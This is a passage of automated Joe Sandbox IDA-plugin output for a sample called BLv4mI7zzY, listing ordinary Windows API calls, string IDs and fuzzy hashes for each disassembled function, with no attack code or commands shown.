                                                              • KillTimer.USER32(-00000001,?,?,?,?,004316CB,00000000,?,?,00431AE2,?,?), ref: 0043216E
                                                              • DestroyAcceleratorTable.USER32(00000000), ref: 0046BCA6
                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004316CB,00000000,?,?,00431AE2,?,?), ref: 0046BCD7
                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004316CB,00000000,?,?,00431AE2,?,?), ref: 0046BCEE
                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004316CB,00000000,?,?,00431AE2,?,?), ref: 0046BD0A
                                                              • DeleteObject.GDI32(00000000), ref: 0046BD1C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                              • String ID:
                                                              • API String ID: 641708696-0
                                                              • Opcode ID: f6ec999343867c35bd6b91e5a7b56598614890a67f76569c0f483601ded439db
                                                              • Instruction ID: 2587c9c70917d8800456710b829310d28c9f2d1f3d081665827f4c103da75067
                                                              • Opcode Fuzzy Hash: f6ec999343867c35bd6b91e5a7b56598614890a67f76569c0f483601ded439db
                                                              • Instruction Fuzzy Hash: B8617F30100A10DFCB29AF15DE48B2A77F1FB44315F50953EE6428A670D7B8A8A5DB99
                                                              APIs
                                                                • Part of subcall function 004325DB: GetWindowLongW.USER32(?,000000EB), ref: 004325EC
                                                              • GetSysColor.USER32(0000000F), ref: 004321D3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ColorLongWindow
                                                              • String ID:
                                                              • API String ID: 259745315-0
                                                              • Opcode ID: 205f7d6e263c52f9b304e55d9acb75771ec56a8f4f8766a35445986154812256
                                                              • Instruction ID: c11efd2f2817f6c8e4ee9b50b5b1722f7bc3a5747d3fcc9f93d4093488074c78
                                                              • Opcode Fuzzy Hash: 205f7d6e263c52f9b304e55d9acb75771ec56a8f4f8766a35445986154812256
                                                              • Instruction Fuzzy Hash: 5A41B331000640EBDB255F28DD88BBA3B65EB0A331F1453B6FE658A2E2D7758C42DB59
                                                              APIs
                                                              • CharLowerBuffW.USER32(?,?,004BF910), ref: 0049A90B
                                                              • GetDriveTypeW.KERNEL32(00000061,004E89A0,00000061), ref: 0049A9D5
                                                              • _wcscpy.LIBCMT ref: 0049A9FF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: BuffCharDriveLowerType_wcscpy
                                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                              • API String ID: 2820617543-1000479233
                                                              • Opcode ID: ed5525bb613458fb95a7e4080db6e9364ac51fa2087a6dab42ee9b80200b12ab
                                                              • Instruction ID: 3fce7ad971d85a49d1b33a2ad1ecfb0a63079a63df5b7caebdb89859b2a7e5d2
                                                              • Opcode Fuzzy Hash: ed5525bb613458fb95a7e4080db6e9364ac51fa2087a6dab42ee9b80200b12ab
                                                              • Instruction Fuzzy Hash: DE51B0711083009BCB14EF15C892A6FBBA5FF94308F10482FF885572A2DB799D19CA9B
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: __i64tow__itow__swprintf
                                                              • String ID: %.15g$0x%p$False$True
                                                              • API String ID: 421087845-2263619337
                                                              • Opcode ID: 62b297b4916753aa7dbc0ff711f850ab1832965202eb3919ef4dc4706e17e294
                                                              • Instruction ID: 106f7434d101ab25cdda73a18b722dd05ea441c5f996f2bc4741faabbedb7c64
                                                              • Opcode Fuzzy Hash: 62b297b4916753aa7dbc0ff711f850ab1832965202eb3919ef4dc4706e17e294
                                                              • Instruction Fuzzy Hash: FF410B71510205AFEB24EF35D841E7673E8FF49304F20446FE98AD7242FA799D068B19
                                                              APIs
                                                              • _memset.LIBCMT ref: 004B716A
                                                              • CreateMenu.USER32 ref: 004B7185
                                                              • SetMenu.USER32(?,00000000), ref: 004B7194
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004B7221
                                                              • IsMenu.USER32(?), ref: 004B7237
                                                              • CreatePopupMenu.USER32 ref: 004B7241
                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004B726E
                                                              • DrawMenuBar.USER32 ref: 004B7276
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                              • String ID: 0$F
                                                              • API String ID: 176399719-3044882817
                                                              • Opcode ID: aaa36d52bb05538d5b64c08f72229d3e6af93333293e10aade05f70b6effb3d5
                                                              • Instruction ID: 8e7815a0e7cebc11e547610150b2d2a93e0f740356776be17ed3a0ce42c75b70
                                                              • Opcode Fuzzy Hash: aaa36d52bb05538d5b64c08f72229d3e6af93333293e10aade05f70b6effb3d5
                                                              • Instruction Fuzzy Hash: 0A418A74A01205EFDB24DF64D984EDA7BB5FF48340F14016AF906A7361D735A924CFA8
                                                              APIs
                                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 004B755E
                                                              • CreateCompatibleDC.GDI32(00000000), ref: 004B7565
                                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 004B7578
                                                              • SelectObject.GDI32(00000000,00000000), ref: 004B7580
                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 004B758B
                                                              • DeleteDC.GDI32(00000000), ref: 004B7594
                                                              • GetWindowLongW.USER32(?,000000EC), ref: 004B759E
                                                              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 004B75B2
                                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004B75BE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                              • String ID: static
                                                              • API String ID: 2559357485-2160076837
                                                              • Opcode ID: 323e0a9092abe90a23d352ba05eb2956fabfcd715aff51e3e0f7cbfd78545d9f
                                                              • Instruction ID: 7195d54fa75e63269f1ac0a26109b20171f8a86d105de0f6c6198a8f0d25bcd5
                                                              • Opcode Fuzzy Hash: 323e0a9092abe90a23d352ba05eb2956fabfcd715aff51e3e0f7cbfd78545d9f
                                                              • Instruction Fuzzy Hash: 4A316E71104214BBDF219F74DC08FDB3B69EF49364F110326FA19961A0C735D825DBA8
                                                              APIs
                                                              • _memset.LIBCMT ref: 00456E3E
                                                                • Part of subcall function 00458B28: __getptd_noexit.LIBCMT ref: 00458B28
                                                              • __gmtime64_s.LIBCMT ref: 00456ED7
                                                              • __gmtime64_s.LIBCMT ref: 00456F0D
                                                              • __gmtime64_s.LIBCMT ref: 00456F2A
                                                              • __allrem.LIBCMT ref: 00456F80
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00456F9C
                                                              • __allrem.LIBCMT ref: 00456FB3
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00456FD1
                                                              • __allrem.LIBCMT ref: 00456FE8
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00457006
                                                              • __invoke_watson.LIBCMT ref: 00457077
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                              • String ID:
                                                              • API String ID: 384356119-0
                                                              • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                              • Instruction ID: a14f19b930f9ac8ef8cebff22dd058a6f423dd34b721c0d4882b950413bb61d3
                                                              • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                              • Instruction Fuzzy Hash: 4F71F672A00716ABD714AE69DC42B5BB3E8AF05729F10423FF914D72C2F778D9088799
                                                              APIs
                                                              • _memset.LIBCMT ref: 00492542
                                                              • GetMenuItemInfoW.USER32(004F5890,000000FF,00000000,00000030), ref: 004925A3
                                                              • SetMenuItemInfoW.USER32(004F5890,00000004,00000000,00000030), ref: 004925D9
                                                              • Sleep.KERNEL32(000001F4), ref: 004925EB
                                                              • GetMenuItemCount.USER32(?), ref: 0049262F
                                                              • GetMenuItemID.USER32(?,00000000), ref: 0049264B
                                                              • GetMenuItemID.USER32(?,-00000001), ref: 00492675
                                                              • GetMenuItemID.USER32(?,?), ref: 004926BA
                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00492700
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00492714
                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00492735
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                              • String ID:
                                                              • API String ID: 4176008265-0
                                                              • Opcode ID: 3b87fc2916457d71b56fea74a0d5a9ac9bd288ee9a3b13301cc912bbbe8c554f
                                                              • Instruction ID: dbc49e5549135cd2dc4ab98f07eb7c6c0a4fe0bd8ffefd94e20d7a5b2c0f3f7d
                                                              • Opcode Fuzzy Hash: 3b87fc2916457d71b56fea74a0d5a9ac9bd288ee9a3b13301cc912bbbe8c554f
                                                              • Instruction Fuzzy Hash: EA618D70900249BFDF21CFA4DE88DAF7FA9EB01344F14017AE841A3251D7B9AD15DB29
                                                              APIs
                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004B6FA5
                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004B6FA8
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 004B6FCC
                                                              • _memset.LIBCMT ref: 004B6FDD
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004B6FEF
                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 004B7067
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$LongWindow_memset
                                                              • String ID:
                                                              • API String ID: 830647256-0
                                                              • Opcode ID: 99459b94f0e7f231bfee6111ff60b554e45c5d4db159e4667b85d8079d40af0e
                                                              • Instruction ID: cf32cd220a9cbfeb1e1bbe0a9ec4565ae1f1eeab2eb4cc3feaaca34f654058dd
                                                              • Opcode Fuzzy Hash: 99459b94f0e7f231bfee6111ff60b554e45c5d4db159e4667b85d8079d40af0e
                                                              • Instruction Fuzzy Hash: EA618C71900208AFDB10DFA8CC81EEE77F8EB48704F10016AFA14AB3A1C775AD55CB68
                                                              APIs
                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00486BBF
                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 00486C18
                                                              • VariantInit.OLEAUT32(?), ref: 00486C2A
                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 00486C4A
                                                              • VariantCopy.OLEAUT32(?,?), ref: 00486C9D
                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00486CB1
                                                              • VariantClear.OLEAUT32(?), ref: 00486CC6
                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 00486CD3
                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00486CDC
                                                              • VariantClear.OLEAUT32(?), ref: 00486CEE
                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00486CF9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                              • String ID:
                                                              • API String ID: 2706829360-0
                                                              • Opcode ID: 56b25182e94226c207c8f672129e532f51597e911a254db144212d617acb63ba
                                                              • Instruction ID: 89c0c8668f5235e942db031c44b88ff926aa63ec91ee2484d1d3a54a9f8c05a8
                                                              • Opcode Fuzzy Hash: 56b25182e94226c207c8f672129e532f51597e911a254db144212d617acb63ba
                                                              • Instruction Fuzzy Hash: 38418171A002199FCF00EFA9DC44DAEBBB9EF18304F01857AE955E7261CB74A949CF94
                                                              APIs
                                                                • Part of subcall function 00439837: __itow.LIBCMT ref: 00439862
                                                                • Part of subcall function 00439837: __swprintf.LIBCMT ref: 004398AC
                                                              • CoInitialize.OLE32 ref: 004A8403
                                                              • CoUninitialize.OLE32 ref: 004A840E
                                                              • CoCreateInstance.OLE32(?,00000000,00000017,004C2BEC,?), ref: 004A846E
                                                              • IIDFromString.OLE32(?,?), ref: 004A84E1
                                                              • VariantInit.OLEAUT32(?), ref: 004A857B
                                                              • VariantClear.OLEAUT32(?), ref: 004A85DC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                              • API String ID: 834269672-1287834457
                                                              • Opcode ID: 38cf6368a69d6c0dc35d5d712b2707096ae5433c1192098cb8b640f8e9333425
                                                              • Instruction ID: 4e1a14bc059534469697640cb27a371e14510077ae59516e284d1cac5ea876f2
                                                              • Opcode Fuzzy Hash: 38cf6368a69d6c0dc35d5d712b2707096ae5433c1192098cb8b640f8e9333425
                                                              • Instruction Fuzzy Hash: C061BD70608312AFC710DF15C848B5BBBE4EF5A754F10091EF9859B291DB78ED48CB9A
                                                              APIs
                                                              • WSAStartup.WSOCK32(00000101,?), ref: 004A5793
                                                              • inet_addr.WSOCK32(?,?,?), ref: 004A57D8
                                                              • gethostbyname.WSOCK32(?), ref: 004A57E4
                                                              • IcmpCreateFile.IPHLPAPI ref: 004A57F2
                                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 004A5862
                                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 004A5878
                                                              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 004A58ED
                                                              • WSACleanup.WSOCK32 ref: 004A58F3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                              • String ID: Ping
                                                              • API String ID: 1028309954-2246546115
                                                              • Opcode ID: 95dfb5c67b6eda7509212e534723f8ba617c83277021071092ede6c0ded868df
                                                              • Instruction ID: ef55c1f3d3c1ed4add505aba7e95ab319407d137a1e756dd967045335c95c7ca
                                                              • Opcode Fuzzy Hash: 95dfb5c67b6eda7509212e534723f8ba617c83277021071092ede6c0ded868df
                                                              • Instruction Fuzzy Hash: 1C51BE316006009FDB10AF25DD85B2AB7E4EF59314F04496EF95ADB2A1DB78EC04CB4A
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 0049B4D0
                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0049B546
                                                              • GetLastError.KERNEL32 ref: 0049B550
                                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 0049B5BD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                              • API String ID: 4194297153-14809454
                                                              • Opcode ID: 966de2861277ab767cf3871a5ba5ff82d5fdbb7d9cf3e8b33d7365eef717f41a
                                                              • Instruction ID: 441496e829d23f7d4858f60fdda6ec3b7af44fbf606fcad667fd84f9629a35f9
                                                              • Opcode Fuzzy Hash: 966de2861277ab767cf3871a5ba5ff82d5fdbb7d9cf3e8b33d7365eef717f41a
                                                              • Instruction Fuzzy Hash: B531A475A00209EFCF00EB69D945AAE7BB4EF48329F11417BF50597291DB789E02CB89
                                                              APIs
                                                                • Part of subcall function 00437DE1: _memmove.LIBCMT ref: 00437E22
                                                                • Part of subcall function 0048AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0048AABC
                                                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00489014
                                                              • GetDlgCtrlID.USER32 ref: 0048901F
                                                              • GetParent.USER32 ref: 0048903B
                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 0048903E
                                                              • GetDlgCtrlID.USER32(?), ref: 00489047
                                                              • GetParent.USER32(?), ref: 00489063
                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00489066
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 1536045017-1403004172
                                                              • Opcode ID: b04255cbfea6588cf6d0799448f528c8d631083dfd63c6bf770b433af1082181
                                                              • Instruction ID: ab5b32e2ed83c71e433c5ddda9c81a79fbc61a1e82d471de9583cc77d5f786a6
                                                              • Opcode Fuzzy Hash: b04255cbfea6588cf6d0799448f528c8d631083dfd63c6bf770b433af1082181
                                                              • Instruction Fuzzy Hash: BD21D670A00108BBDF05BBA1CC85EFEBB74EF49310F10062BF961972A1DB795819DB28
                                                              APIs
                                                                • Part of subcall function 00437DE1: _memmove.LIBCMT ref: 00437E22
                                                                • Part of subcall function 0048AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0048AABC
                                                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004890FD
                                                              • GetDlgCtrlID.USER32 ref: 00489108
                                                              • GetParent.USER32 ref: 00489124
                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00489127
                                                              • GetDlgCtrlID.USER32(?), ref: 00489130
                                                              • GetParent.USER32(?), ref: 0048914C
                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 0048914F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
